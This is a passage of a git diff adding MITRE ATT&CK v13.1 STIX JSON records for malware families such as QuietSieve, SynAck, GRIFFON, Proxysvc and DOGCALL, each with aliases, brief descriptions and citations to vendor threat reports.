b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--03eb4a05-6a02-43f6-afb7-3c7835501828.json new file mode 100644 index 0000000000000000000000000000000000000000..591b20da101992cf715980799ec78224813a5d0e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--03eb4a05-6a02-43f6-afb7-3c7835501828.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--a0de5146-0aeb-4c8e-9b55-92bc6cd2385c", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "QuietSieve" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "malware", + "id": "malware--03eb4a05-6a02-43f6-afb7-3c7835501828", + "created": "2022-02-18T16:46:39.268Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S0686", + "url": "https://attack.mitre.org/software/S0686" + }, + { + "source_name": "Microsoft Actinium February 2022", + "url": "https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/", + "description": "Microsoft Threat Intelligence Center. (2022, February 4). ACTINIUM targets Ukrainian organizations. Retrieved February 18, 2022." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[QuietSieve](https://attack.mitre.org/software/S0686) is an information stealer that has been used by [Gamaredon Group](https://attack.mitre.org/groups/G0047) since at least 2021.(Citation: Microsoft Actinium February 2022)", + "modified": "2022-04-15T12:31:52.469Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "QuietSieve", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--04227b24-7817-4de1-9050-b7b1b57f5866.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--04227b24-7817-4de1-9050-b7b1b57f5866.json new file mode 100644 index 0000000000000000000000000000000000000000..dbe721306fc5b1b71a60717bfa281da2243c6b87 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--04227b24-7817-4de1-9050-b7b1b57f5866.json @@ -0,0 +1,55 @@ +{ + "type": "bundle", + "id": "bundle--d049e860-d559-40ef-b1a1-d6d9176f18fe", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "SynAck" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--04227b24-7817-4de1-9050-b7b1b57f5866", + "type": "malware", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0242", + "external_id": "S0242" + }, + { + "source_name": "SynAck", + "description": "(Citation: SecureList SynAck Doppelg\u00e4nging May 2018) (Citation: Kaspersky Lab SynAck May 2018)" + }, + { + "source_name": "SecureList SynAck Doppelg\u00e4nging May 2018", + "description": "Ivanov, A. et al. (2018, May 7). SynAck targeted ransomware uses the Doppelg\u00e4nging technique. Retrieved May 22, 2018.", + "url": "https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/" + }, + { + "source_name": "Kaspersky Lab SynAck May 2018", + "description": "Bettencourt, J. (2018, May 7). Kaspersky Lab finds new variant of SynAck ransomware using sophisticated Doppelg\u00e4nging technique. Retrieved May 24, 2018.", + "url": "https://usa.kaspersky.com/about/press-releases/2018_synack-doppelganging" + } + ], + "modified": "2021-09-08T19:22:44.438Z", + "name": "SynAck", + "description": "[SynAck](https://attack.mitre.org/software/S0242) is variant of Trojan ransomware targeting mainly English-speaking users since at least fall 2017. (Citation: SecureList SynAck Doppelg\u00e4nging May 2018) (Citation: Kaspersky Lab SynAck May 2018)", + "x_mitre_version": "1.3", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--049ff071-0b3c-4712-95d2-d21c6aa54501.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--049ff071-0b3c-4712-95d2-d21c6aa54501.json new file mode 100644 index 0000000000000000000000000000000000000000..ae7b6e4413c719c5227526a2e8ca94aa56a3151d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--049ff071-0b3c-4712-95d2-d21c6aa54501.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--bbeb2145-73b4-4d32-b525-3fe39dcc04b0", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "MURKYTOP" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--049ff071-0b3c-4712-95d2-d21c6aa54501", + "type": "malware", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0233", + "external_id": "S0233" + }, + { + "source_name": "MURKYTOP", + "description": "(Citation: FireEye Periscope March 2018)" + }, + { + "url": "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", + "description": "FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018.", + "source_name": "FireEye Periscope March 2018" + } + ], + "modified": "2020-03-30T17:00:19.828Z", + "name": "MURKYTOP", + "description": "[MURKYTOP](https://attack.mitre.org/software/S0233) is a reconnaissance tool used by [Leviathan](https://attack.mitre.org/groups/G0065). (Citation: FireEye Periscope March 2018)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--04fc1842-f9e4-47cf-8cb8-5c61becad142.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--04fc1842-f9e4-47cf-8cb8-5c61becad142.json new file mode 100644 index 0000000000000000000000000000000000000000..a209bd6ee87757b6092777d413d9ec28aaa7d35a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--04fc1842-f9e4-47cf-8cb8-5c61becad142.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--228ef21b-1f02-4230-bb76-fa3084887df7", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "GRIFFON" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--04fc1842-f9e4-47cf-8cb8-5c61becad142", + "type": "malware", + "created": "2019-10-11T17:29:20.165Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0417", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0417" + }, + { + "description": "Namestnikov, Y. and Aime, F. (2019, May 8). FIN7.5: the infamous cybercrime rig \u201cFIN7\u201d continues its activities. Retrieved October 11, 2019.", + "url": "https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/", + "source_name": "SecureList Griffon May 2019" + } + ], + "modified": "2020-06-23T19:20:45.892Z", + "name": "GRIFFON", + "description": "[GRIFFON](https://attack.mitre.org/software/S0417) is a JavaScript backdoor used by [FIN7](https://attack.mitre.org/groups/G0046). (Citation: SecureList Griffon May 2019)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--051eaca1-958f-4091-9e5f-a9acd8f820b5.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--051eaca1-958f-4091-9e5f-a9acd8f820b5.json new file mode 100644 index 0000000000000000000000000000000000000000..e2b19145589b14133fa7fdee8519a214d686dc19 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--051eaca1-958f-4091-9e5f-a9acd8f820b5.json @@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--c549f32d-addd-455a-9d44-c477290f4b04", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-26T18:59:38.457Z", + "name": "Exaramel for Windows", + "description": "[Exaramel for Windows](https://attack.mitre.org/software/S0343) is a backdoor used for targeting Windows systems. The Linux version is tracked separately under [Exaramel for Linux](https://attack.mitre.org/software/S0401).(Citation: ESET TeleBots Oct 2018)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "2.2", + "x_mitre_aliases": [ + "Exaramel for Windows" + ], + "type": "malware", + "id": "malware--051eaca1-958f-4091-9e5f-a9acd8f820b5", + "created": "2019-01-30T15:10:03.894Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0343", + "external_id": "S0343" + }, + { + "source_name": "Exaramel for Windows", + "description": "(Citation: ESET TeleBots Oct 2018)" + }, + { + "source_name": "ESET TeleBots Oct 2018", + "description": "Cherepanov, A., Lipovsky, R. (2018, October 11). New TeleBots backdoor: First evidence linking Industroyer to NotPetya. Retrieved November 27, 2018.", + "url": "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--05318127-5962-444b-b900-a9dcfe0ff6e9.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--05318127-5962-444b-b900-a9dcfe0ff6e9.json new file mode 100644 index 0000000000000000000000000000000000000000..f3b41c3d3b204f187bfde8bea727b1c9d72be42b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--05318127-5962-444b-b900-a9dcfe0ff6e9.json @@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--18d46685-76b1-4413-95e9-0f25582a44a1", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-14T21:33:47.608Z", + "name": "Amadey", + "description": "[Amadey](https://attack.mitre.org/software/S1025) is a Trojan bot that has been used since at least October 2018.(Citation: Korean FSI TA505 2020)(Citation: BlackBerry Amadey 2020)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "Amadey" + ], + "type": "malware", + "id": "malware--05318127-5962-444b-b900-a9dcfe0ff6e9", + "created": "2022-07-14T17:30:54.927Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1025", + "external_id": "S1025" + }, + { + "source_name": "Korean FSI TA505 2020", + "description": "Financial Security Institute. (2020, February 28). Profiling of TA505 Threat Group That Continues to Attack the Financial Sector. Retrieved July 14, 2022.", + "url": "https://www.fsec.or.kr/user/bbs/fsec/163/344/bbsDataView/1382.do?page=1&column=&search=&searchSDate=&searchEDate=&bbsDataCategory=" + }, + { + "source_name": "BlackBerry Amadey 2020", + "description": "Kasuya, M. (2020, January 8). Threat Spotlight: Amadey Bot Targets Non-Russian Users. Retrieved July 14, 2022.", + "url": "https://blogs.blackberry.com/en/2020/01/threat-spotlight-amadey-bot" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--065196de-d7e8-4888-acfb-b2134022ba1b.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--065196de-d7e8-4888-acfb-b2134022ba1b.json new file mode 100644 index 0000000000000000000000000000000000000000..1e64a2d2ffc1adaa4d505d54fe2c38a6fd75da49 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--065196de-d7e8-4888-acfb-b2134022ba1b.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--75d1c910-d5bf-4698-92ed-5fd2fe064e5d", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "RDFSNIFFER" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--065196de-d7e8-4888-acfb-b2134022ba1b", + "type": "malware", + "created": "2019-10-11T16:13:19.588Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0416", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0416" + }, + { + "source_name": "FireEye FIN7 Oct 2019", + "url": "https://www.fireeye.com/blog/threat-research/2019/10/mahalo-fin7-responding-to-new-tools-and-techniques.html", + "description": "Carr, N, et all. (2019, October 10). Mahalo FIN7: Responding to the Criminal Operators\u2019 New Tools and Techniques. Retrieved October 11, 2019." + } + ], + "modified": "2019-10-16T15:34:22.990Z", + "name": "RDFSNIFFER", + "description": "[RDFSNIFFER](https://attack.mitre.org/software/S0416) is a module loaded by [BOOSTWRITE](https://attack.mitre.org/software/S0415) which allows an attacker to monitor and tamper with legitimate connections made via an application designed to provide visibility and system management capabilities to remote IT techs.(Citation: FireEye FIN7 Oct 2019)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--069af411-9b24-4e85-b26c-623d035bbe84.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--069af411-9b24-4e85-b26c-623d035bbe84.json new file mode 100644 index 0000000000000000000000000000000000000000..6bd14204fb105847bbdfb076d35a70c9634a1b6d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--069af411-9b24-4e85-b26c-623d035bbe84.json @@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--1a1a3aab-117a-4c23-87c8-ba47cef0b11f", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Edward Millington" + ], + "x_mitre_aliases": [ + "Proxysvc" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--069af411-9b24-4e85-b26c-623d035bbe84", + "type": "malware", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0238", + "external_id": "S0238" + }, + { + "source_name": "Proxysvc", + "description": "(Citation: McAfee GhostSecret)" + }, + { + "url": "https://securingtomorrow.mcafee.com/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/", + "description": "Sherstobitoff, R., Malhotra, A. (2018, April 24). Analyzing Operation GhostSecret: Attack Seeks to Steal Data Worldwide. Retrieved May 16, 2018.", + "source_name": "McAfee GhostSecret" + } + ], + "modified": "2020-03-30T17:23:20.589Z", + "name": "Proxysvc", + "description": "[Proxysvc](https://attack.mitre.org/software/S0238) is a malicious DLL used by [Lazarus Group](https://attack.mitre.org/groups/G0032) in a campaign known as Operation GhostSecret. It has appeared to be operating undetected since 2017 and was mostly observed in higher education organizations. The goal of [Proxysvc](https://attack.mitre.org/software/S0238) is to deliver additional payloads to the target and to maintain control for the attacker. It is in the form of a DLL that can also be executed as a standalone process. (Citation: McAfee GhostSecret)", + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--06d735e7-1db1-4dbe-ab4b-acbe419f902b.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--06d735e7-1db1-4dbe-ab4b-acbe419f902b.json new file mode 100644 index 0000000000000000000000000000000000000000..95987f55361be617712b150363dff2f2a3b070a8 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--06d735e7-1db1-4dbe-ab4b-acbe419f902b.json @@ -0,0 +1,62 @@ +{ + "type": "bundle", + "id": "bundle--8279cb7a-b195-417b-a225-c1d15e70750d", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Orz", + "AIRBREAK" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "malware", + "id": "malware--06d735e7-1db1-4dbe-ab4b-acbe419f902b", + "created": "2018-04-18T17:59:24.739Z", + "x_mitre_version": "2.2", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S0229", + "url": "https://attack.mitre.org/software/S0229" + }, + { + "source_name": "AIRBREAK", + "description": "(Citation: FireEye Periscope March 2018)" + }, + { + "source_name": "Orz", + "description": "(Citation: Proofpoint Leviathan Oct 2017)" + }, + { + "source_name": "Proofpoint Leviathan Oct 2017", + "url": "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", + "description": "Axel F, Pierre T. (2017, October 16). Leviathan: Espionage actor spearphishes maritime and defense targets. Retrieved February 15, 2018." + }, + { + "source_name": "FireEye Periscope March 2018", + "url": "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", + "description": "FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Orz](https://attack.mitre.org/software/S0229) is a custom JavaScript backdoor used by [Leviathan](https://attack.mitre.org/groups/G0065). It was observed being used in 2014 as well as in August 2017 when it was dropped by Microsoft Publisher files. (Citation: Proofpoint Leviathan Oct 2017) (Citation: FireEye Periscope March 2018)", + "modified": "2022-04-19T01:33:33.267Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Orz", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0715560d-4299-4e84-9e20-6e80ab57e4f2.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0715560d-4299-4e84-9e20-6e80ab57e4f2.json new file mode 100644 index 0000000000000000000000000000000000000000..2ac2eab331fb096e135e07476107825dfee0b8a5 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0715560d-4299-4e84-9e20-6e80ab57e4f2.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--3fcdf0d9-203f-422d-8143-8144ac509a2d", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-21T11:45:38.621Z", + "name": "Torisma", + "description": "[Torisma](https://attack.mitre.org/software/S0678) is a second stage implant designed for specialized monitoring that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032). [Torisma](https://attack.mitre.org/software/S0678) was discovered during an investigation into the 2020 Operation North Star campaign that targeted the defense sector.(Citation: McAfee Lazarus Nov 2020)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_aliases": [ + "Torisma" + ], + "type": "malware", + "id": "malware--0715560d-4299-4e84-9e20-6e80ab57e4f2", + "created": "2022-02-01T16:21:13.097Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0678", + "external_id": "S0678" + }, + { + "source_name": "McAfee Lazarus Nov 2020", + "description": "Beek, C. (2020, November 5). Operation North Star: Behind The Scenes. Retrieved December 20, 2021.", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-behind-the-scenes/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--071d5d65-83ec-4a55-acfa-be7d5f28ba9a.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--071d5d65-83ec-4a55-acfa-be7d5f28ba9a.json new file mode 100644 index 0000000000000000000000000000000000000000..12fbad0c57242a9e9a827a46fd2852dc809bd748 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--071d5d65-83ec-4a55-acfa-be7d5f28ba9a.json @@ -0,0 +1,55 @@ +{ + "type": "bundle", + "id": "bundle--34fc2fe9-5c62-45e2-89ee-5cad0fb213d2", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "NOKKI" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--071d5d65-83ec-4a55-acfa-be7d5f28ba9a", + "type": "malware", + "created": "2019-01-30T19:50:45.307Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0353", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0353" + }, + { + "source_name": "NOKKI", + "description": "(Citation: Unit 42 NOKKI Sept 2018)" + }, + { + "source_name": "Unit 42 NOKKI Sept 2018", + "url": "https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/", + "description": "Grunzweig, J., Lee, B. (2018, September 27). New KONNI Malware attacking Eurasia and Southeast Asia. Retrieved November 5, 2018." + }, + { + "source_name": "Unit 42 Nokki Oct 2018", + "url": "https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/", + "description": "Grunzweig, J. (2018, October 01). NOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT. Retrieved November 5, 2018." + } + ], + "modified": "2020-03-18T15:22:32.747Z", + "name": "NOKKI", + "description": "[NOKKI](https://attack.mitre.org/software/S0353) is a modular remote access tool. The earliest observed attack using [NOKKI](https://attack.mitre.org/software/S0353) was in January 2018. [NOKKI](https://attack.mitre.org/software/S0353) has significant code overlap with the [KONNI](https://attack.mitre.org/software/S0356) malware family. There is some evidence potentially linking [NOKKI](https://attack.mitre.org/software/S0353) to [APT37](https://attack.mitre.org/groups/G0067).(Citation: Unit 42 NOKKI Sept 2018)(Citation: Unit 42 Nokki Oct 2018)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0817aaf2-afea-4c32-9285-4dcd1df5bf14.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0817aaf2-afea-4c32-9285-4dcd1df5bf14.json new file mode 100644 index 0000000000000000000000000000000000000000..3bcc6976c349db361fcce4cd71ce8e4132573c9c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0817aaf2-afea-4c32-9285-4dcd1df5bf14.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--318ea906-ca69-486d-ada5-cbf26d1b9d54", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "yty" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--0817aaf2-afea-4c32-9285-4dcd1df5bf14", + "type": "malware", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0248", + "external_id": "S0248" + }, + { + "source_name": "yty", + "description": "(Citation: ASERT Donot March 2018)" + }, + { + "source_name": "ASERT Donot March 2018", + "description": "Schwarz, D., Sopko J. (2018, March 08). Donot Team Leverages New Modular Malware Framework in South Asia. Retrieved June 11, 2018.", + "url": "https://www.arbornetworks.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia/" + } + ], + "modified": "2020-03-28T21:45:32.149Z", + "name": "yty", + "description": "[yty](https://attack.mitre.org/software/S0248) is a modular, plugin-based malware framework. The components of the framework are written in a variety of programming languages. (Citation: ASERT Donot March 2018)", + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0852567d-7958-4f4b-8947-4f840ec8d57d.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0852567d-7958-4f4b-8947-4f840ec8d57d.json new file mode 100644 index 0000000000000000000000000000000000000000..163d997558576aaa9ee3d24f2819d1fa41002a85 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0852567d-7958-4f4b-8947-4f840ec8d57d.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--844a7d65-7f74-4c62-bc00-72a77d4c65c6", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "DOGCALL" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--0852567d-7958-4f4b-8947-4f840ec8d57d", + "type": "malware", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0213", + "external_id": "S0213" + }, + { + "source_name": "DOGCALL", + "description": "(Citation: FireEye APT37 Feb 2018)" + }, + { + "source_name": "FireEye APT37 Feb 2018", + "description": "FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved March 1, 2018.", + "url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf" + } + ], + "modified": "2020-03-30T15:27:25.149Z", + "name": "DOGCALL", + "description": "[DOGCALL](https://attack.mitre.org/software/S0213) is a backdoor used by [APT37](https://attack.mitre.org/groups/G0067) that has been used to target South Korean government and military organizations in 2017. It is typically dropped using a Hangul Word Processor (HWP) exploit. (Citation: FireEye APT37 Feb 2018)", + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--088f1d6e-0783-47c6-9923-9c79b2af43d4.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--088f1d6e-0783-47c6-9923-9c79b2af43d4.json new file mode 100644 index 0000000000000000000000000000000000000000..7311d6400a52cc59b6c7b8067c6ecfcba8fa61ff --- 